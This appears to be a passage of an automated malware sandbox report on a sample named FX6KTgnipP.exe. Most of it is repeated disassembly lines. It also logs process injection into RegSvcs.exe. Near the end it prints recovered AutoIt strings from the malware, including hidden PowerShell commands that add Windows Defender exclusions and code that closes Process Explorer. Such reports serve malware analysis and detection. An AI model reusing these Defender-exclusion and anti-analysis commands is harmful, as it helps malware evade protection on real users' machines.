                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FC8F9 mov eax, dword ptr fs:[00000030h] 14_2_019FC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A908C0 mov eax, dword ptr fs:[00000030h] 14_2_01A908C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A6483A mov eax, dword ptr fs:[00000030h] 14_2_01A6483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A6483A mov eax, dword ptr fs:[00000030h] 14_2_01A6483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov ecx, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h] 14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FA830 mov eax, dword ptr fs:[00000030h] 14_2_019FA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4C810 mov eax, dword ptr fs:[00000030h] 14_2_01A4C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C4859 mov eax, dword ptr fs:[00000030h] 14_2_019C4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C4859 mov eax, dword ptr fs:[00000030h] 14_2_019C4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F0854 mov eax, dword ptr fs:[00000030h] 14_2_019F0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A56870 mov eax, dword ptr fs:[00000030h] 14_2_01A56870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A56870 mov eax, dword ptr fs:[00000030h] 14_2_01A56870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4E872 mov eax, dword ptr fs:[00000030h] 14_2_01A4E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4E872 mov eax, dword ptr fs:[00000030h] 14_2_01A4E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D2840 mov ecx, dword ptr fs:[00000030h] 14_2_019D2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A74BB0 mov eax, dword ptr fs:[00000030h] 14_2_01A74BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A74BB0 mov eax, dword ptr fs:[00000030h] 14_2_01A74BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D0BBE mov eax, dword ptr fs:[00000030h] 14_2_019D0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D0BBE mov eax, dword ptr fs:[00000030h] 14_2_019D0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h] 14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h] 14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h] 14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4CBF0 mov eax, dword ptr fs:[00000030h] 14_2_01A4CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h] 14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h] 14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h] 14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019EEBFC mov eax, dword ptr fs:[00000030h] 14_2_019EEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h] 14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h] 14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h] 14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A6EBD0 mov eax, dword ptr fs:[00000030h] 14_2_01A6EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A88B28 mov eax, dword ptr fs:[00000030h] 14_2_01A88B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A88B28 mov eax, dword ptr fs:[00000030h] 14_2_01A88B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A94B00 mov eax, dword ptr fs:[00000030h] 14_2_01A94B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h] 14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019EEB20 mov eax, dword ptr fs:[00000030h] 14_2_019EEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019EEB20 mov eax, dword ptr fs:[00000030h] 14_2_019EEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019B8B50 mov eax, dword ptr fs:[00000030h] 14_2_019B8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A68B42 mov eax, dword ptr fs:[00000030h] 14_2_01A68B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A56B40 mov eax, dword ptr fs:[00000030h] 14_2_01A56B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A56B40 mov eax, dword ptr fs:[00000030h] 14_2_01A56B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019BCB7E mov eax, dword ptr fs:[00000030h] 14_2_019BCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A8AB40 mov eax, dword ptr fs:[00000030h] 14_2_01A8AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A74B4B mov eax, dword ptr fs:[00000030h] 14_2_01A74B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A74B4B mov eax, dword ptr fs:[00000030h] 14_2_01A74B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A6EB50 mov eax, dword ptr fs:[00000030h] 14_2_01A6EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h] 14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h] 14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h] 14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h] 14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A16AA4 mov eax, dword ptr fs:[00000030h] 14_2_01A16AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F8A90 mov edx, dword ptr fs:[00000030h] 14_2_019F8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h] 14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A94A80 mov eax, dword ptr fs:[00000030h] 14_2_01A94A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C8AA0 mov eax, dword ptr fs:[00000030h] 14_2_019C8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C8AA0 mov eax, dword ptr fs:[00000030h] 14_2_019C8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C0AD0 mov eax, dword ptr fs:[00000030h] 14_2_019C0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F4AD0 mov eax, dword ptr fs:[00000030h] 14_2_019F4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F4AD0 mov eax, dword ptr fs:[00000030h] 14_2_019F4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h] 14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h] 14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h] 14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FAAEE mov eax, dword ptr fs:[00000030h] 14_2_019FAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FAAEE mov eax, dword ptr fs:[00000030h] 14_2_019FAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FCA38 mov eax, dword ptr fs:[00000030h] 14_2_019FCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E4A35 mov eax, dword ptr fs:[00000030h] 14_2_019E4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E4A35 mov eax, dword ptr fs:[00000030h] 14_2_019E4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019EEA2E mov eax, dword ptr fs:[00000030h] 14_2_019EEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4CA11 mov eax, dword ptr fs:[00000030h] 14_2_01A4CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FCA24 mov eax, dword ptr fs:[00000030h] 14_2_019FCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D0A5B mov eax, dword ptr fs:[00000030h] 14_2_019D0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D0A5B mov eax, dword ptr fs:[00000030h] 14_2_019D0A5B
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00272CE0 GetProcessHeap, 0_2_00272CE0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00266878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00266878
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00266A0B SetUnhandledExceptionFilter, 0_2_00266A0B
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_0026AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0026AAC4
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Code function: 0_2_00265BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00265BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_008829B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_00870BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00870BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_00870D65 SetUnhandledExceptionFilter, 7_2_00870D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_00870FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00870FB1
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_003629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_003629B2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_00350BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00350BCF
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_00350D65 SetUnhandledExceptionFilter, 15_2_00350D65
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_2_00350FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00350FB1

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Code function: 15_3_01853001 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 15_3_01853001
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\UserAccountControlSettings.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10DB008
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A69008
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 237008
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B15008
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_008B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_008B1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 Code function: 7_2_00853312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 7_2_00853312
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler()
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis()
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer")
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe")
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe")
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @ ` ` ` ` @ fi
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sfail
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sfail@
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\fonts
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (fx6ktgnipp.exe)
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sbuilt-in ico codecico*.icoimage/x-icon
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sbuilt-in png codecpng*.pngimage/png
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sbuilt-in tiff codectiff*.tif;*.tiffimage/tiffiimm
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: built-in wmf codecwmf*.wmfimage/x-wmf
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: built-in emf codecemf*.emfimage/x-emf emf
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gif89agif87a
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sbuilt-in gif codecgif*.gifimage/gifgif89agif87a
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sbuilt-in jpeg codecjpeg*.jpg;*.jpeg;*.jpe;*.jfifimage/jpeg
